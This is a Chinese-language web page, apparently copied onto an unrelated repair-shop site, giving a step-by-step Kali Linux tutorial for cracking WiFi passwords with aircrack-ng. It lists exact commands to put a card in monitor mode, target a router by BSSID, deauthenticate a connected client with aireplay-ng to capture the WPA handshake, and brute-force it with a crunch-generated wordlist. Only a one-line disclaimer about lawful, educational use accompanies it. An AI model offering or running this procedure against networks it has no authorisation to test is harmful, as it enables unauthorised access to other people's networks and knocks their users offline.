kali使用aircrack无线攻击wifi超详细步骤(包含监听网卡启动,获得握手包,密码本生成) |
您所在的位置:网站首页 › 如何手机破解wifi密码并可以查看密码的软件 › kali使用aircrack无线攻击wifi超详细步骤(包含监听网卡启动,获得握手包,密码本生成) |
平台及工具: linux:kali平台 aircrack - ng 工具 免驱监听网卡 详细操作 1.首先启动kali,插入网卡,输入ifconfig查看kali是否检测到监听网卡,注意监听网卡要免驱动的。 ifconfig //查看自身网卡信息如图,看到wlan0就代表kali成功检测到监听网卡啦。 2.在启动网卡的监听模式之前一定要杀死进程,否则将会监听不到附近的WiFi,执行下面命令杀死进程。 airmon-ng check kill //杀死有关进程3.杀死进程以后,执行以下命令开启网卡的监听模式。 airmon-ng start wlan0 //启动网卡的监听模式4.开启网卡的监听模式之后,执行命令监听附近WIFI信息,监听到需要的信息之后ctrl+c停止。 airodump-ng wlan0mon //监听周围的无线WiFi5.执行以下命令查看监听到的路由器的详细信息。 airodump-ng wlan0mon -c 1 --bssid 50:BD:5F:8B:26:FE -w ~/wlan0mon对上述参数的解释 1.-c:接的是上图中的CH,代表信道。 2.--bssid:路由器的MAC地址。 3.PWR:信号强度,数值越大代表信号越强。 4.ENC:使用的加密方式。 5.AUTH:代表认证方式。 6.ESSID:代表WIFI名字。 7.-w ~/wlan0mon:将抓取的流量包保存到根目录下并命名为wlan0mon。输入上述命令后的效果如上图所示,会对指定的路由器进行监控,第一行为WIFI主机,第二行为连接了该WIFI的用户。 6.执行攻击命令断开该用户与WIFI主机之间的连接。 aireplay-ng -0 50 -a 50:BD:5F:8B:26:FE -c 2C:D2:6B:CA:54:8D wlan0mon-0 表示发起默认的攻击,之后接的数字代表攻击次数,上图是攻击50次,如果想进行断网攻击就只用填写0,默认一直攻击。 -a 指定的无线路由器的BSSID -c 指定断开连接的用户的MAC地址(上图中为STATION) 如此便可以获得握手包啦。 7.执行命令跑密码本获得WiFi密码。 aircrack-ng wlan0mon-01.cap -w password.txtwlan0mon-01.cap 代表握手包 password.txt 代表密码本 附:密码本的生成和导出方法。 crunch 9 9 -p 123 321 111 333解释一下”-p”之前是几位数密码,需要注意我这里写了两个9,因为这其实是个范围,相当与9位~9位,如果是不确定几位,就是这是个范围,比方说是4~7位,就写 crunch 4 7 -p 123 321 111 333如果要导出到根下的password.txt,就写 crunch 4 7 -p 123 321 111 333 > /password.txt破解过程这里就不演示啦,最后说一句,善用技术,遵纪守法,加强网络安全意识,此文仅供学习参考。 |
今日新闻 |
推荐新闻 |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |